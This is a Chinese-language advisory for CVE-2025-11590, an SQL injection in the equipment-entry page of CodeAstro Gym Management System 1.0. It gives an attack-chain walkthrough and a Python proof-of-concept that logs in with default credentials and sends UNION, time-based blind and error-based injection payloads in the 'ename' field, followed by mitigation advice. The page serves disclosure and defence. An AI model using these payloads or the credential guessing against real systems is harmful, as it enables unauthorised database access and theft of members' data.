CVE-2025-11590：CodeAstro健身房管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11590

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Gym Management System

漏洞概述

CVE-2025-11590是CodeAstro Gym Management System 1.0版本中存在的一个SQL注入安全漏洞。该漏洞被评定为中危级别，CVSS 3.1评分为6.3分。漏洞存在于系统的/admin/equipment-entry.php文件中，具体涉及对参数ename的处理逻辑存在缺陷，攻击者可以通过构造恶意的SQL语句注入到该参数中，从而执行未授权的数据库操作。

CodeAstro Gym Management System是一款用于健身房管理的Web应用程序，提供了包括会员管理、设备管理、课程安排等功能。由于该系统的管理员后台接口对用户输入缺乏充分的验证和过滤，攻击者可以在远程条件下利用此漏洞实施攻击。该漏洞已被公开披露，相关的攻击方法和利用代码已在互联网上流传，对使用该系统的健身房运营方构成了实际的安全威胁。

根据CVSS向量分析，该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L），无需用户交互（UI:N）。成功利用后，攻击者可以对系统的机密性、完整性和可用性造成低级别的影响。尽管影响等级为低，但SQL注入漏洞通常可作为进一步攻击的跳板，攻击者可能通过该漏洞获取数据库中的敏感信息，甚至在某些情况下实现远程代码执行。建议使用CodeAstro Gym Management System 1.0版本的用户尽快采取相应的防护措施。

技术细节

该漏洞的根本原因在于/admin/equipment-entry.php文件中对ename参数的处理未采用参数化查询或充分的输入过滤，而是直接将用户输入拼接到SQL查询语句中执行，形成了典型的SQL注入漏洞。

从技术层面分析，攻击者可以通过以下方式利用此漏洞：

1. 攻击者首先需要获取管理员后台的低权限访问凭证（PR:L），这可能通过暴力破解、社会工程学或购买泄露的凭证等方式获得。

2. 登录管理后台后，攻击者定位到设备录入页面（equipment-entry.php），该页面用于录入健身房设备信息。

3. 攻击者在ename参数中注入恶意的SQL语句，例如使用单引号闭合原始查询，并附加UNION SELECT等SQL语句来提取数据库中的敏感数据。

4. 由于缺乏输入验证和参数化查询，注入的SQL语句将被数据库服务器执行，攻击者可以读取、修改或删除数据库中的数据。

5. 根据数据库类型（如MySQL）和服务器配置，攻击者还可能利用SQL注入实现文件系统读取、命令执行等更高级的攻击。

该漏洞的利用复杂度较低，攻击者无需与受害者进行交互即可完成攻击，且利用代码已公开传播，降低了攻击的技术门槛。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过公开渠道或搜索引擎发现目标系统使用CodeAstro Gym Management System 1.0，并识别出/admin/equipment-entry.php端点存在SQL注入漏洞。

STEP 2

步骤2：获取低权限凭证

攻击者通过暴力破解、默认凭证（如admin/admin）或社工攻击获取管理员后台的低权限访问凭证。

STEP 3

步骤3：登录管理后台

使用获取的凭证登录到系统的管理后台，建立有效的会话。

STEP 4

步骤4：构造注入Payload

在ename参数中注入恶意SQL语句，如使用UNION SELECT联合查询或基于时间的盲注payload。

STEP 5

步骤5：执行注入攻击

通过POST请求向/admin/equipment-entry.php发送包含恶意payload的请求，触发SQL注入。

STEP 6

步骤6：数据提取与利用

成功利用后，攻击者可以从数据库中提取敏感信息（如用户凭证、个人信息），或修改/删除数据，进一步渗透系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11590 - CodeAstro Gym Management System SQL Injection PoC
# Vulnerability: SQL Injection in /admin/equipment-entry.php via 'ename' parameter
# CVSS: 6.3 (MEDIUM)

import requests
import sys

# Target configuration
TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/equipment-entry.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Create a session to maintain cookies
session = requests.Session()

def login(base_url, username, password):
    """Login to admin panel to obtain low-privilege access"""
    login_url = f"{base_url}/admin/"
    # Attempt login with default or known credentials
    data = {
        "username": username,
        "password": password
    }
    response = session.post(login_url, data=data, allow_redirects=True)
    return response

def exploit_sql_injection(base_url):
    """Exploit SQL injection in ename parameter"""
    target_url = f"{base_url}{ADMIN_PATH}"

    # SQL Injection payload - UNION based injection to extract database info
    # Adjust column count based on the original query
    payload = "Test' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"

    # Alternative time-based blind injection payload
    time_based_payload = "Test' AND SLEEP(5)-- -"

    # Alternative error-based payload
    error_based_payload = "Test' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)-- -"

    data = {
        "ename": payload,
        # Add other required form fields
        "submit": ""
    }

    response = session.post(target_url, data=data)

    if response.status_code == 200:
        print(f"[+] Response length: {len(response.text)}")
        # Check for SQL error messages or data leakage
        if "error" in response.text.lower() or "sql" in response.text.lower():
            print("[+] Possible SQL injection detected!")
        print(response.text[:500])
    return response

def check_vulnerability(base_url):
    """Quick vulnerability check using time-based blind injection"""
    target_url = f"{base_url}{ADMIN_PATH}"

    # Normal request timing
    import time
    start = time.time()
    normal_data = {"ename": "test_equipment", "submit": ""}
    session.post(target_url, data=normal_data)
    normal_time = time.time() - start

    # Time-based injection request
    start = time.time()
    inject_data = {"ename": "test' AND SLEEP(3)-- -", "submit": ""}
    session.post(target_url, data=inject_data)
    inject_time = time.time() - start

    if inject_time - normal_time > 2:
        print(f"[+] Vulnerability confirmed! Time difference: {inject_time - normal_time:.2f}s")
        return True
    else:
        print("[-] Target may not be vulnerable")
        return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]

    print(f"[*] Target: {TARGET_URL}")
    print("[*] Logging in...")
    login(TARGET_URL, USERNAME, PASSWORD)

    print("[*] Checking vulnerability...")
    if check_vulnerability(TARGET_URL):
        print("[*] Exploiting...")
        exploit_sql_injection(TARGET_URL)

影响范围

CodeAstro Gym Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对/admin/equipment-entry.php文件中的ename参数实施输入过滤，仅允许字母、数字和特定安全字符；2）在Web服务器层面部署WAF规则，拦截常见的SQL注入payload；3）限制管理后台的访问IP范围，仅允许可信IP访问；4）监控数据库日志，检测异常的SQL查询模式；5）尽快联系CodeAstro官方获取安全补丁或升级到修复后的版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11590
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11590
3 Details https://www.cvedetails.com/cve/CVE-2025-11590/
4 VulDB https://vuldb.com/cve/CVE-2025-11590
5 Link https://codeastro.com/
6 Link https://github.com/coppeliaz/cve/issues/3
7 Link https://vuldb.com/?ctiid.327911
8 Link https://vuldb.com/?id.327911
9 Link https://vuldb.com/?submit.671738
10 Link https://github.com/coppeliaz/cve/issues/3